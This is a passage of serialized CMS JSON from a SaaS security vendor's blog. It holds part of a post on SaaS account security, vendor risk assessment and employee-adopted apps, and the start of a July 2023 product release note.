be:",[],{},{"nodeType":250,"data":300311,"content":300312},{},[300313,300322,300332],{"nodeType":254,"data":300314,"content":300315},{},[300316],{"nodeType":178,"data":300317,"content":300318},{},[300319],{"nodeType":173,"value":281067,"marks":300320,"data":300321},[],{},{"nodeType":254,"data":300323,"content":300324},{},[300325],{"nodeType":178,"data":300326,"content":300327},{},[300328],{"nodeType":173,"value":300329,"marks":300330,"data":300331},"Ensuring employees are using strong passwords, especially if MFA and/or SSO aren’t available.",[],{},{"nodeType":254,"data":300333,"content":300334},{},[300335],{"nodeType":178,"data":300336,"content":300337},{},[300338],{"nodeType":173,"value":281087,"marks":300339,"data":300340},[],{},{"nodeType":235,"data":300342,"content":300343},{},[300344],{"nodeType":173,"value":300345,"marks":300346,"data":300347},"Customer responsibility for apps employees have adopted",[],{},{"nodeType":312,"data":300349,"content":300353},{"target":300350},{"sys":300351},{"id":300352,"type":317,"linkType":318},"2T7DtBRBBITb4Wy8unQHZV",[],{"nodeType":178,"data":300355,"content":300356},{},[300357],{"nodeType":173,"value":300358,"marks":300359,"data":300360},"While most organizations think of the supply chain aspect (“Should we be using this app?”) as the majority of the problem, or at least the first problem to solve - account security is ultimately at the heart of the problem.",[],{},{"nodeType":178,"data":300362,"content":300363},{},[300364],{"nodeType":173,"value":300365,"marks":300366,"data":300367},"A developer or support engineer with a weak password or missing MFA is all it takes for them to get phished, kicking off a string of attacks. ",[],{},{"nodeType":178,"data":300369,"content":300370},{},[300371,300375,300384],{"nodeType":173,"value":300372,"marks":300373,"data":300374},"The mistake many security professionals make, is that they focus their efforts only on securing the critical apps that are known to the organization. However, it is possible to compromise what would be considered as a non-critical SaaS application and use that to move laterally to the critical ones. See our research project discussing the various ",[],{},{"nodeType":1698,"data":300376,"content":300379},{"target":300377},{"sys":300378},{"id":208338,"type":317,"linkType":318},[300380],{"nodeType":173,"value":300381,"marks":300382,"data":300383},"SaaS attacks",[],{},{"nodeType":173,"value":1477,"marks":300385,"data":300386},[],{},{"nodeType":178,"data":300388,"content":300389},{},[300390],{"nodeType":173,"value":300391,"marks":300392,"data":300393},"Luckily, unlike the complex SaaS application supply chain risk audits, account security issues are straightforward to fix. ",[],{},{"nodeType":169,"data":300395,"content":300396},{},[300397],{"nodeType":173,"value":300398,"marks":300399,"data":300400},"Right, but how do I also manage supply chain risk?",[],{},{"nodeType":178,"data":300402,"content":300403},{},[300404,300408,300413],{"nodeType":173,"value":300405,"marks":300406,"data":300407},"Security due diligence or app risk assessments are typically how you answer the question - ",[],{},{"nodeType":173,"value":300409,"marks":300410,"data":300412},"Should we use this app?",[300411],{"type":1646},{},{"nodeType":173,"value":10557,"marks":300414,"data":300415},[],{},{"nodeType":178,"data":300417,"content":300418},{},[300419],{"nodeType":173,"value":300420,"marks":300421,"data":300422},"These are standard processes for most organizations as part of a software procurement process.",[],{},{"nodeType":178,"data":300424,"content":300425},{},[300426,300430,300435],{"nodeType":173,"value":300427,"marks":300428,"data":300429},"However, security no longer fully controls software adoption - ",[],{},{"nodeType":173,"value":300431,"marks":300432,"data":300434},"employees are self-adopting the tools they want without oversight",[300433],{"type":370},{},{"nodeType":173,"value":1477,"marks":300436,"data":300437},[],{},{"nodeType":178,"data":300439,"content":300440},{},[300441],{"nodeType":173,"value":300442,"marks":300443,"data":300444},"So, you need to work to find serious security risks as soon as possible once the self-adoption process begins (normally by the first employee creating an account on the app).",[],{},{"nodeType":178,"data":300446,"content":300447},{},[300448],{"nodeType":173,"value":300449,"marks":300450,"data":300451},"Ultimately, how much you care about any of the above comes down to the risk of the data in the application (is there sensitive customer data in it?) or the level of access you grant this application into the rest of your infrastructure (often through integrations with other SaaS apps). ",[],{},{"nodeType":178,"data":300453,"content":300454},{},[300455],{"nodeType":173,"value":300456,"marks":300457,"data":300458},"Therefore, a useful first step is to understand the sensitivity of the data and access granted to the app (or that will likely be granted by employees in future to make the app work as expected). This will help you prioritize reviews.",[],{},{"nodeType":235,"data":300460,"content":300461},{},[300462],{"nodeType":173,"value":300463,"marks":300464,"data":300465},"Tips for SaaS app and SaaS provider risk assessments",[],{},{"nodeType":178,"data":300467,"content":300468},{},[300469],{"nodeType":173,"value":300470,"marks":300471,"data":300472},"The security relevant areas of this risk assessment can typically be broken into:",[],{},{"nodeType":250,"data":300474,"content":300475},{},[300476,300513,300580],{"nodeType":254,"data":300477,"content":300478},{},[300479,300490],{"nodeType":178,"data":300480,"content":300481},{},[300482,300487],{"nodeType":173,"value":300483,"marks":300484,"data":300486},"Product risk",[300485],{"type":370},{},{"nodeType":173,"value":10557,"marks":300488,"data":300489},[],{},{"nodeType":250,"data":300491,"content":300492},{},[300493,300503],{"nodeType":254,"data":300494,"content":300495},{},[300496],{"nodeType":178,"data":300497,"content":300498},{},[300499],{"nodeType":173,"value":300500,"marks":300501,"data":300502},"Does the product have the necessary security features (MFA, SSO, etc.) to protect our data, and ",[],{},{"nodeType":254,"data":300504,"content":300505},{},[300506],{"nodeType":178,"data":300507,"content":300508},{},[300509],{"nodeType":173,"value":300510,"marks":300511,"data":300512},"Has the product security been technically verified (e.g. through a third party penetration test)?",[],{},{"nodeType":254,"data":300514,"content":300515},{},[300516,300527],{"nodeType":178,"data":300517,"content":300518},{},[300519,300524],{"nodeType":173,"value":300520,"marks":300521,"data":300523},"Vendor risk",[300522],{"type":370},{},{"nodeType":173,"value":10557,"marks":300525,"data":300526},[],{},{"nodeType":250,"data":300528,"content":300529},{},[300530,300540,300550,300560,300570],{"nodeType":254,"data":300531,"content":300532},{},[300533],{"nodeType":178,"data":300534,"content":300535},{},[300536],{"nodeType":173,"value":300537,"marks":300538,"data":300539},"Does the vendor have the resources to secure the product? ",[],{},{"nodeType":254,"data":300541,"content":300542},{},[300543],{"nodeType":178,"data":300544,"content":300545},{},[300546],{"nodeType":173,"value":300547,"marks":300548,"data":300549},"Have they invested in a security team and implemented appropriate security processes?",[],{},{"nodeType":254,"data":300551,"content":300552},{},[300553],{"nodeType":178,"data":300554,"content":300555},{},[300556],{"nodeType":173,"value":300557,"marks":300558,"data":300559},"Have those processes been independently audited (e.g. SOC2)? ",[],{},{"nodeType":254,"data":300561,"content":300562},{},[300563],{"nodeType":178,"data":300564,"content":300565},{},[300566],{"nodeType":173,"value":300567,"marks":300568,"data":300569},"Does the vendor operate in a high risk region?",[],{},{"nodeType":254,"data":300571,"content":300572},{},[300573],{"nodeType":178,"data":300574,"content":300575},{},[300576],{"nodeType":173,"value":300577,"marks":300578,"data":300579},"Does the vendor have a history of repeated security incidents?",[],{},{"nodeType":254,"data":300581,"content":300582},{},[300583,300595],{"nodeType":178,"data":300584,"content":300585},{},[300586,300591],{"nodeType":173,"value":300587,"marks":300588,"data":300590},"Vendor sub processors",[300589],{"type":370},{},{"nodeType":173,"value":300592,"marks":300593,"data":300594}," - the majority of SaaS applications are built on other *-as-a-Service platforms. These vendors are also part of your supply chain. Just because you don’t directly use a tool or app doesn’t mean you’re not affected when they’re popped. ",[],{},{"nodeType":250,"data":300596,"content":300597},{},[300598],{"nodeType":254,"data":300599,"content":300600},{},[300601],{"nodeType":178,"data":300602,"content":300603},{},[300604],{"nodeType":173,"value":300605,"marks":300606,"data":300607},"Realistically, you’re probably not going to be able to go very deep here, but when you’re wondering whether you’re affected by a breach in the news, you may want to know whether your vendors are using the affected SaaS app. ",[],{},{"nodeType":235,"data":300609,"content":300610},{},[300611],{"nodeType":173,"value":300612,"marks":300613,"data":300614},"How to quickly assess security risks of employee-adopted SaaS applications",[],{},{"nodeType":178,"data":300616,"content":300617},{},[300618],{"nodeType":173,"value":300619,"marks":300620,"data":300621},"For employee-adopted SaaS platforms (those neither you nor the IT team had a hand in procuring and officially adopting on behalf of the company) you’re typically stuck doing your usual software procurement tasks after the app is adopted.",[],{},{"nodeType":178,"data":300623,"content":300624},{},[300625],{"nodeType":173,"value":300626,"marks":300627,"data":300628},"These include things like: ",[],{},{"nodeType":250,"data":300630,"content":300631},{},[300632,300642,300652],{"nodeType":254,"data":300633,"content":300634},{},[300635],{"nodeType":178,"data":300636,"content":300637},{},[300638],{"nodeType":173,"value":300639,"marks":300640,"data":300641},"legal agreements (terms and conditions, master service agreements etc.)",[],{},{"nodeType":254,"data":300643,"content":300644},{},[300645],{"nodeType":178,"data":300646,"content":300647},{},[300648],{"nodeType":173,"value":300649,"marks":300650,"data":300651},"spend (through licensing cost etc.)",[],{},{"nodeType":254,"data":300653,"content":300654},{},[300655],{"nodeType":178,"data":300656,"content":300657},{},[300658],{"nodeType":173,"value":300659,"marks":300660,"data":300661},"uptime and availability (SLAs etc.) ",[],{},{"nodeType":178,"data":300663,"content":300664},{},[300665],{"nodeType":173,"value":300666,"marks":300667,"data":300668},"Often, this comes up once employees need to upgrade to a paid account or higher license tier, or once it makes financial sense to commit to longer term agreements. ",[],{},{"nodeType":178,"data":300670,"content":300671},{},[300672],{"nodeType":173,"value":300673,"marks":300674,"data":300675},"For that reason, I recommend you keep the security risk assessment focused on the direct security aspects initially, so you reduce the work required to determine if there’s a security reason to stop employees from using this app right now.",[],{},{"nodeType":169,"data":300677,"content":300678},{},[300679],{"nodeType":173,"value":300680,"marks":300681,"data":300682},"Managing SaaS account security for employee-adopted SaaS",[],{},{"nodeType":178,"data":300684,"content":300685},{},[300686,300690,300694],{"nodeType":173,"value":300687,"marks":300688,"data":300689},"Shifting the focus back to SaaS user account security, the very first step before you can even begin securing these accounts is to get visibility into all the apps your employees have adopted on their own. There are a few tools on the market to help with this. We’re obviously biased, but we feel that detecting SaaS use within the employees’ browser - where they’re accessing the app in the first place - is the most sensible and offers accurate visibility without a load of noisy false-positives. Read more about how we do this ",[],{},{"nodeType":173,"value":28052,"marks":300691,"data":300693},[300692],{"type":194},{},{"nodeType":173,"value":1477,"marks":300695,"data":300696},[],{},{"nodeType":312,"data":300698,"content":300701},{"target":300699},{"sys":300700},{"id":169040,"type":317,"linkType":318},[],{"nodeType":235,"data":300703,"content":300704},{},[300705],{"nodeType":173,"value":300706,"marks":300707,"data":300708},"I’ve got visibility, now what?",[],{},{"nodeType":178,"data":300710,"content":300711},{},[300712],{"nodeType":173,"value":300713,"marks":300714,"data":300715},"Once you’ve found the accounts, you’ll want to ensure that you’re:",[],{},{"nodeType":250,"data":300717,"content":300718},{},[300719,300729,300739,300749],{"nodeType":254,"data":300720,"content":300721},{},[300722],{"nodeType":178,"data":300723,"content":300724},{},[300725],{"nodeType":173,"value":300726,"marks":300727,"data":300728},"Enabling MFA for all accounts",[],{},{"nodeType":254,"data":300730,"content":300731},{},[300732],{"nodeType":178,"data":300733,"content":300734},{},[300735],{"nodeType":173,"value":300736,"marks":300737,"data":300738},"Encouraging employees to use strong passwords (ideally through a password manager)",[],{},{"nodeType":254,"data":300740,"content":300741},{},[300742],{"nodeType":178,"data":300743,"content":300744},{},[300745],{"nodeType":173,"value":300746,"marks":300747,"data":300748},"Using SSO, where possible and practical",[],{},{"nodeType":254,"data":300750,"content":300751},{},[300752],{"nodeType":178,"data":300753,"content":300754},{},[300755],{"nodeType":173,"value":300756,"marks":300757,"data":300758},"Reviewing access delegated to third-parties (through e.g. OAuth integrations) ",[],{},{"nodeType":178,"data":300760,"content":300761},{},[300762],{"nodeType":173,"value":300763,"marks":300764,"data":300765},"These tasks are tricky to do at scale, where you’re likely to find hundreds of SaaS apps you didn’t know about. Most SaaS security solutions - those focused on security rather than just keeping an up-to-date inventory - will provide some insight into how employees are logging into SaaS apps and whether they’re using MFA and strong passwords.\n\nWhen you’re looking for a solution, this is the kind of actionable data you’re going to want if you want to make a real impact on SaaS security. ",[],{},{"nodeType":169,"data":300767,"content":300768},{},[300769],{"nodeType":173,"value":300770,"marks":300771,"data":300772},"Choose the solution that works best for your company and team",[],{},{"nodeType":178,"data":300774,"content":300775},{},[300776],{"nodeType":173,"value":300777,"marks":300778,"data":300779},"The increase in employee-adopted apps has led to employees creating more accounts, on more apps. Without the guiding hand of security to make sure strong identity and access controls are in place, you’ll need a SaaS security solution that can give you that level of visibility so you can take action. Manage SaaS risks by leveraging a SaaS security platform that offers you not just visibility, but can also provide security relevant information about the SaaS app and the SaaS provider to help you quickly perform due diligence so you can keep up.",[],{},{"entries":300781},{"inline":300782,"hyperlink":300783,"block":300788},[],[300784,300786],{"sys":300785,"__typename":1528,"title":284931,"slug":284932},{"id":273995},{"sys":300787,"__typename":1528,"title":209117,"slug":209120},{"id":208338},[300789,300792,300798,300806],{"sys":300790,"__typename":5345,"title":298893,"caption":118,"layoutMode":112585,"file":300791},{"id":283612},{"url":298895,"width":66767,"height":298896},{"sys":300793,"__typename":5345,"title":300794,"caption":300794,"layoutMode":112585,"file":300795},{"id":281248},"Two parts of SaaS security",{"url":300796,"width":5358,"height":300797},"https://images.ctfassets.net/y1cdw1ablpvd/2dRhaTc75s2mHGYmreOZDS/8d0c2dddbabfeaddd99f3f9aa781e718/image3.png",806,{"sys":300799,"__typename":5345,"title":300800,"caption":300801,"layoutMode":112585,"file":300802},{"id":300352},"Shared responsibility model - customer responsibilities - PLG","The security controls customers are responsible for",{"url":300803,"width":300804,"height":300805},"https://images.ctfassets.net/y1cdw1ablpvd/5NHny8Lh0CQjkK3N6WEbAM/ae9ee10605795c547d25177061b42391/image6.png",1966,1096,{"sys":300807,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},"content:blog:what-is-saas-security.json","blog/what-is-saas-security.json","blog/what-is-saas-security",{"_path":300812,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":300813,"ogImage":118,"summary":300815,"title":285244,"subtitle":118,"metaTitle":300826,"synopsis":285245,"hashTags":118,"publishedDate":285246,"slug":285247,"tagsCollection":300827,"relatedBlogPostsCollection":300831,"authorsCollection":301660,"content":301664,"_id":301914,"_type":5439,"_source":5440,"_file":301915,"_stem":301916,"_extension":5439},"/blog/product-release-july-2023",{"id":285006,"publishedAt":300814},"2026-02-03T18:20:37.080Z",{"json":300816},{"data":300817,"content":300818,"nodeType":165},{},[300819],{"data":300820,"content":300821,"nodeType":178},{},[300822],{"data":300823,"marks":300824,"value":300825,"nodeType":173},{},[],"Get notified about new SaaS immediately, jumpstart your risk reviews with app classification, learn about security findings via ChatOps, and ask end-users to remove dormant integrations.","Push Security new product features for July 2023 ",{"items":300828},[300829],{"sys":300830,"name":18399},{"id":18398},{"items":300832},[300833,301142],{"__typename":1528,"sys":300834,"content":300835,"title":285598,"synopsis":285599,"hashTags":118,"publishedDate":285600,"slug":285601,"tagsCollection":301134,"authorsCollection":301138},{"id":285258},{"json":300836},{"data":300837,"content":300838,"nodeType":165},{},[300839,300845,300893,300899,300925,300931,300936,300952,300958,300973,300978,300994,301000,301022,301027,301043,301049,301062,301067,301083,301089,301113,301118],{"data":300840,"content":300841,"nodeType":235},{},[300842],{"data":300843,"marks":300844,"value":285269,"nodeType":173},{},[],{"data":300846,"content":300847,"nodeType":250},{},[300848,300857,300866,300875,300884],{"data":300849,"content":300850,"nodeType":254},{},[300851],{"data":300852,"content":300853,"nodeType":178},{},[300854],{"data":300855,"marks":300856,"value":285282,"nodeType":173},{},[],{"data":300858,"content":300859,"nodeType":254},{},[300860],{"data":300861,"content":300862,"nodeType":178},{},[300863],{"data":300864,"marks":300865,"value":285292,"nodeType":173},{},[],{"data":300867,"content":300868,"nodeType":254},{},[300869],{"data":300870,"content":300871,"nodeType":178},{},[300872],{"data":300873,"marks":300874,"value":285302,"nodeType":173},{},[],{"data":300876,"content":300877,"nodeType":254},{},[300878],{"data":300879,"content":300880,"nodeType":178},{},[300881],{"data":300882,"marks":300883,"value":285312,"nodeType":173},{},[],{"data":300885,"content":300886,"nodeType":254},{},[300887],{"data":300888,"content":300889,"nodeType":178},{},[300890],{"data":300891,"marks":300892,"value":285322,"nodeType":173},{},[],{"data":300894,"content":300895,"nodeType":235},{},[300896],{"data":300897,"marks":300898,"value":285282,"nodeType":173},{},[],{"data":300900,"content":300901,"nodeType":178},{},[300902,300905,300911,300914,300922],{"data":300903,"marks":300904,"value":65284,"nodeType":173},{},[],{"data":300906,"content":300907,"nodeType":186},{"uri":285337},[300908],{"data":300909,"marks":300910,"value":285342,"nodeType":173},{},[],{"data":300912,"marks":300913,"value":285346,"nodeType":173},{},[],{"data":300915,"content":300918,"nodeType":1698},{"target":300916},{"sys":300917},{"id":285090,"type":317,"linkType":318},[300919],{"data":300920,"marks":300921,"value":285355,"nodeType":173},{},[],{"data":300923,"marks":300924,"value":1477,"nodeType":173},{},[],{"data":300926,"content":300927,"nodeType":178},{},[300928],{"data":300929,"marks":300930,"value":285365,"nodeType":173},{},[],{"data":300932,"content":300935,"nodeType":312},{"target":300933},{"sys":300934},{"id":285370,"type":317,"linkType":318},[],{"data":300937,"content":300938,"nodeType":178},{},[300939,300942,300949],{"data":300940,"marks":300941,"value":37,"nodeType":173},{},[],{"data":300943,"content":300944,"nodeType":186},{"uri":285337},[300945],{"data":300946,"marks":300947,"value":148770,"nodeType":173},{},[300948],{"type":370},{"data":300950,"marks":300951,"value":37,"nodeType":173},{},[],{"data":300953,"content":300954,"nodeType":235},{},[300955],{"data":300956,"marks":300957,"value":285292,"nodeType":173},{},[],{"data":300959,"content":300960,"nodeType":178},{},[300961,300964,300970],{"data":300962,"marks":300963,"value":285400,"nodeType":173},{},[],{"data":300965,"content":300966,"nodeType":186},{"uri":285403},[300967],{"data":300968,"marks":300969,"value":285408,"nodeType":173},{},[],{"data":300971,"marks":300972,"value":285412,"nodeType":173},{},[],{"data":300974,"content":300977,"nodeType":312},{"target":300975},{"sys":300976},{"id":285417,"type":317,"linkType":318},[],{"data":300979,"content":300980,"nodeType":178},{},[300981,300984,300991],{"data":300982,"marks":300983,"value":37,"nodeType":173},{},[],{"data":300985,"content":300986,"nodeType":186},{"uri":285427},[300987],{"data":300988,"marks":300989,"value":148770,"nodeType":173},{},[300990],{"type":370},{"data":300992,"marks":300993,"value":37,"nodeType":173},{},[],{"data":300995,"content":300996,"nodeType":235},{},[300997],{"data":300998,"marks":300999,"value":285442,"nodeType":173},{},[],{"data":301001,"content":301002,"nodeType":178},{},[301003,301006,301012,301015,301019],{"data":301004,"marks":301005,"value":285449,"nodeType":173},{},[],{"data":301007,"content":301008,"nodeType":186},{"uri":285452},[301009],{"data":301010,"marks":301011,"value":285457,"nodeType":173},{},[],{"data":301013,"marks":301014,"value":285461,"nodeType":173},{},[],{"data":301016,"marks":301017,"value":18734,"nodeType":173},{},[301018],{"type":370},{"data":301020,"marks":301021,"value":285469,"nodeType":173},{},[],{"data":301023,"content":301026,"nodeType":312},{"target":301024},{"sys":301025},{"id":285474,"type":317,"linkType":318},[],{"data":301028,"content":301029,"nodeType":178},{},[301030,301033,301040],{"data":301031,"marks":301032,"value":37,"nodeType":173},{},[],{"data":301034,"content":301035,"nodeType":186},{"uri":285484},[301036],{"data":301037,"marks":301038,"value":148770,"nodeType":173},{},[301039],{"type":370},{"data":301041,"marks":301042,"value":37,"nodeType":173},{},[],{"data":301044,"content":301045,"nodeType":235},{},[301046],{"data":301047,"marks":301048,"value":285312,"nodeType":173},{},[],{"data":301050,"content":301051,"nodeType":178},{},[301052,301055,301059],{"data":301053,"marks":301054,"value":285505,"nodeType":173},{},[],{"data":301056,"marks":301057,"value":285510,"nodeType":173},{},[301058],{"type":370},{"data":301060,"marks":301061,"value":285514,"nodeType":173},{},[],{"data":301063,"content":301066,"nodeType":312},{"target":301064},{"sys":301065},{"id":285519,"type":317,"linkType":318},[],{"data":301068,"content":301069,"nodeType":178},{},[301070,301073,301080],{"data":301071,"marks":301072,"value":37,"nodeType":173},{},[],{"data":301074,"content":301075,"nodeType":186},{"uri":285529},[301076],{"data":301077,"marks":301078,"value":148770,"nodeType":173},{},[301079],{"type":370},{"data":301081,"marks":301082,"value":37,"nodeType":173},{},[],{"data":301084,"content":301085,"nodeType":235},{},[301086],{"data":301087,"marks":301088,"value":285544,"nodeType":173},{},[],{"data":301090,"content":301091,"nodeType":178},{},[301092,301095,301101,301104,301110],{"data":301093,"marks":301094,"value":285551,"nodeType":173},{},[],{"data":301096,"content":301097,"nodeType":186},{"uri":285554},[301098],{"data":301099,"marks":301100,"value":3262,"nodeType":173},{},[],{"data":301102,"marks":301103,"value":285562,"nodeType":173},{},[],{"data":301105,"content":301106,"nodeType":186},{"uri":285565},[301107],{"data":301108,"marks":301109,"value":285570,"nodeType":173},{},[],{"data":301111,"marks":301112,"value":285574,"nodeType":173},{},[],{"data":301114,"content":301117,"nodeType":312},{"target":301115},{"sys":301116},{"id":285579,"type":317,"linkType":318},[],{"data":301119,"content":301120,"nodeType":178},{},[301121,301124,301131],{"data":301122,"marks":301123,"value":37,"nodeType":173},{},[],{"data":301125,"content":301126,"nodeType":186},{"uri":285554},[301127],{"data":301128,"marks":301129,"value":285594,"nodeType":173},{},[301130],{"type":370},{"data":301132,"marks":301133,"value":37,"nodeType":173},{},[],{"items":301135},[301136],{"sys":301137,"name":18399},{"id":18398},{"items":301139},[301140],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":301141},{"url":19129},{"__typename":1528,"sys":301143,"content":301145,"title":301648,"synopsis":301649,"hashTags":118,"publishedDate":301650,"slug":301651,"tagsCollection":301652,"authorsCollection":301656},{"id":301144},"1XpZhWMXj1jERhAudRkJyt",{"json":301146},{"nodeType":165,"data":301147,"content":301148},{},[301149,301155,301208,301227,301234,301268,301276,301304,301310,301328,301334,301350,301384,301390,301406,301413,301420,301448,301467,301487,301494,301531,301557,301563,301570,301593,301608,301614,301621],{"nodeType":235,"data":301150,"content":301151},{},[301152],{"nodeType":173,"value":220348,"marks":301153,"data":301154},[],{},{"nodeType":250,"data":301156,"content":301157},{},[301158,301168,301178,301188,301198],{"nodeType":254,"data":301159,"content":301160},{},[301161],{"nodeType":178,"data":301162,"content":301163},{},[301164],{"nodeType":173,"value":301165,"marks":301166,"data":301167},"Just-in-time password guidance with inline browser prompts",[],{},{"nodeType":254,"data":301169,"content":301170},{},[301171],{"nodeType":178,"data":301172,"content":301173},{},[301174],{"nodeType":173,"value":301175,"marks":301176,"data":301177},"Identify dormant third-party integrations",[],{},{"nodeType":254,"data":301179,"content":301180},{},[301181],{"nodeType":178,"data":301182,"content":301183},{},[301184],{"nodeType":173,"value":301185,"marks":301186,"data":301187},"Expanded visibility into MFA usage for apps",[],{},{"nodeType":254,"data":301189,"content":301190},{},[301191],{"nodeType":178,"data":301192,"content":301193},{},[301194],{"nodeType":173,"value":301195,"marks":301196,"data":301197},"Find passwords exposed in a data breach and make a custom restricted list",[],{},{"nodeType":254,"data":301199,"content":301200},{},[301201],{"nodeType":178,"data":301202,"content":301203},{},[301204],{"nodeType":173,"value":301205,"marks":301206,"data":301207},"Improved account security page",[],{},{"nodeType":178,"data":301209,"content":301210},{},[301211,301215,301223],{"nodeType":173,"value":301212,"marks":301213,"data":301214},"Want to share your input on our product roadmap? ",[],{},{"nodeType":186,"data":301216,"content":301218},{"uri":301217},"https://meetings.hubspot.com/joe-stanulis/push-demo",[301219],{"nodeType":173,"value":301220,"marks":301221,"data":301222},"Set up a call",[],{},{"nodeType":173,"value":301224,"marks":301225,"data":301226}," with our team — we’d love to hear from you.",[],{},{"nodeType":235,"data":301228,"content":301229},{},[301230],{"nodeType":173,"value":301231,"marks":301232,"data":301233},"Catch weak passwords before they happen with new Push Labs feature",[],{},{"nodeType":178,"data":301235,"content":301236},{},[301237,301240,301247,301251,301256,301260,301264],{"nodeType":173,"value":37,"marks":301238,"data":301239},[],{},{"nodeType":186,"data":301241,"content":301243},{"uri":301242},"https://pushsecurity.com/help/10078#start",[301244],{"nodeType":173,"value":285457,"marks":301245,"data":301246},[],{},{"nodeType":173,"value":301248,"marks":301249,"data":301250}," is a ",[],{},{"nodeType":173,"value":301252,"marks":301253,"data":301255},"new early-access program",[301254],{"type":370},{},{"nodeType":173,"value":301257,"marks":301258,"data":301259}," that allows you to try features before they roll out to everyone. With ",[],{},{"nodeType":173,"value":248675,"marks":301261,"data":301263},[301262],{"type":370},{},{"nodeType":173,"value":301265,"marks":301266,"data":301267},", the first Labs feature, you can enable tooltip messages that will appear in the employee’s browser when they sign up for new SaaS apps with a weak or reused password, or when they log into existing ones. ",[],{},{"nodeType":178,"data":301269,"content":301270},{},[301271],{"nodeType":173,"value":301272,"marks":301273,"data":301275},"By providing just-in-time guidance, inline prompts encourage employees to practice better password hygiene without adding to your team’s workload.",[301274],{"type":370},{},{"nodeType":178,"data":301277,"content":301278},{},[301279,301283,301291,301295,301300],{"nodeType":173,"value":301280,"marks":301281,"data":301282},"You can enable inline browser prompts by logging into the ",[],{},{"nodeType":186,"data":301284,"content":301286},{"uri":301285},"https://pushsecurity.com/app/employees/",[301287],{"nodeType":173,"value":301288,"marks":301289,"data":301290},"Push admin console",[],{},{"nodeType":173,"value":301292,"marks":301293,"data":301294}," and going to ",[],{},{"nodeType":173,"value":301296,"marks":301297,"data":301299},"Settings > Push Labs",[301298],{"type":370},{},{"nodeType":173,"value":301301,"marks":301302,"data":301303}," and then toggle on the new feature.",[],{},{"nodeType":312,"data":301305,"content":301309},{"target":301306},{"sys":301307},{"id":301308,"type":317,"linkType":318},"2cMY8EPS5XqpKniYr9dFaP",[],{"nodeType":178,"data":301311,"content":301312},{},[301313,301317,301325],{"nodeType":173,"value":301314,"marks":301315,"data":301316},"We’d love to hear your feedback! Get in touch at ",[],{},{"nodeType":186,"data":301318,"content":301320},{"uri":301319},"mailto:support@pushsecurity.com",[301321],{"nodeType":173,"value":301322,"marks":301323,"data":301324},"support@pushsecurity.com",[],{},{"nodeType":173,"value":2340,"marks":301326,"data":301327},[],{},{"nodeType":235,"data":301329,"content":301330},{},[301331],{"nodeType":173,"value":301175,"marks":301332,"data":301333},[],{},{"nodeType":178,"data":301335,"content":301336},{},[301337,301341,301346],{"nodeType":173,"value":301338,"marks":301339,"data":301340},"You can now see when a third-party integration that’s connected with your Microsoft 365 or Google Workspace tenant ",[],{},{"nodeType":173,"value":301342,"marks":301343,"data":301345},"was last used",[301344],{"type":370},{},{"nodeType":173,"value":301347,"marks":301348,"data":301349}," for each of your users. ",[],{},{"nodeType":178,"data":301351,"content":301352},{},[301353,301357,301362,301366,301371,301375,301380],{"nodeType":173,"value":301354,"marks":301355,"data":301356},"Go to ",[],{},{"nodeType":173,"value":301358,"marks":301359,"data":301361},"Explore > Third-party integrations",[301360],{"type":370},{},{"nodeType":173,"value":301363,"marks":301364,"data":301365}," and then select the integration. In the integration details pane, select ",[],{},{"nodeType":173,"value":301367,"marks":301368,"data":301370},"Consented by",[301369],{"type":370},{},{"nodeType":173,"value":301372,"marks":301373,"data":301374}," and then review the ",[],{},{"nodeType":173,"value":301376,"marks":301377,"data":301379},"Last used",[301378],{"type":370},{},{"nodeType":173,"value":301381,"marks":301382,"data":301383}," column.",[],{},{"nodeType":312,"data":301385,"content":301389},{"target":301386},{"sys":301387},{"id":301388,"type":317,"linkType":318},"Twl7krB2vBxtGMzfcCVnS",[],{"nodeType":178,"data":301391,"content":301392},{},[301393,301397,301402],{"nodeType":173,"value":301394,"marks":301395,"data":301396},"With this data, you can more easily ",[],{},{"nodeType":173,"value":301398,"marks":301399,"data":301401},"find dormant integrations",[301400],{"type":370},{},{"nodeType":173,"value":301403,"marks":301404,"data":301405}," that can be removed without impacting your employees so that you can reduce your SaaS attack surface. ",[],{},{"nodeType":178,"data":301407,"content":301408},{},[301409],{"nodeType":173,"value":301410,"marks":301411,"data":301412},"This information is also just generally helpful as you discover which integrations are being actively used in your organization.",[],{},{"nodeType":235,"data":301414,"content":301415},{},[301416],{"nodeType":173,"value":301417,"marks":301418,"data":301419},"Expanded visibility into whether employees are using MFA",[],{},{"nodeType":178,"data":301421,"content":301422},{},[301423,301427,301435,301439,301444],{"nodeType":173,"value":301424,"marks":301425,"data":301426},"Push already provides visibility into whether employees are ",[],{},{"nodeType":186,"data":301428,"content":301430},{"uri":301429},"https://pushsecurity.com/lp/automated-mfa-deployment",[301431],{"nodeType":173,"value":301432,"marks":301433,"data":301434},"using MFA",[],{},{"nodeType":173,"value":301436,"marks":301437,"data":301438}," for your primary work platform (Google Workspace or Microsoft 365). We’re now ",[],{},{"nodeType":173,"value":301440,"marks":301441,"data":301443},"expanding that capability to other SaaS apps",[301442],{"type":370},{},{"nodeType":173,"value":301445,"marks":301446,"data":301447},". This new capability is provided by our browser extension and can be used to detect MFA usage whether or not the SaaS platform provides an API, allowing us to expand our coverage to virtually any SaaS app.",[],{},{"nodeType":178,"data":301449,"content":301450},{},[301451,301455,301464],{"nodeType":173,"value":301452,"marks":301453,"data":301454},"You can see MFA usage data on the ",[],{},{"nodeType":186,"data":301456,"content":301458},{"uri":301457},"https://pushsecurity.com/app/feature/account-security/",[301459],{"nodeType":173,"value":301460,"marks":301461,"data":301463},"Account security",[301462],{"type":370},{},{"nodeType":173,"value":148819,"marks":301465,"data":301466},[],{},{"nodeType":178,"data":301468,"content":301469},{},[301470,301474,301483],{"nodeType":173,"value":301471,"marks":301472,"data":301473},"Check the ",[],{},{"nodeType":186,"data":301475,"content":301477},{"uri":301476},"https://pushsecurity.com/integration/supported/",[301478],{"nodeType":173,"value":301479,"marks":301480,"data":301482},"Supported SaaS",[301481],{"type":370},{},{"nodeType":173,"value":301484,"marks":301485,"data":301486}," page to see where the Push browser extension offers MFA detection. We’re starting with support for high-value apps first, such as administrator tools, and expanding from there. ",[],{},{"nodeType":235,"data":301488,"content":301489},{},[301490],{"nodeType":173,"value":301491,"marks":301492,"data":301493},"Find passwords exposed in a data breach and enhance password hygiene checks with a custom restricted words 